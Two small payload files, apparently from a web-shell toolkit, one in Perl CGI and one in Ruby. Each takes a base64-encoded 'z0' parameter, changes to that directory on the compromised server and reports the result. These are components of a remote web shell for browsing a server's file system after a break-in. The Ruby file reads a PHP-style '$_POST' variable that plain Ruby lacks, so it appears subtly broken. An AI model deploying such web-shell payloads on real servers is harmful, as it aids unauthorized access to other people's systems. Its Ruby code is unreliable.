File: Payload/Perl/CGI/OneShell/file_pathExists.pl
use strict;
use warnings;
use CGI;
use MIME::Base64;
use Cwd qw(getcwd);

sub main {
    my $q = CGI->new;
    my $z0 = $q->param('z0') // '';

    my $sz_dir_path = decode_base64($z0);

    if (chdir($sz_dir_path)) {
        print "1|" . getcwd();
    } else {
        die "ERROR://Cannot open directory.";
    }
}

main();

File: Payload/Ruby/CGI/OneShell/file_pathExists.rb
require 'base64'

def main
  sz_dir_path = Base64.decode64($_POST['z0'].to_s)

  begin
    Dir.chdir(sz_dir_path) do
      print "1|#{Dir.pwd}"
    end
  rescue => e
    print 'ERROR://Cannot open directory.'
  end
end

main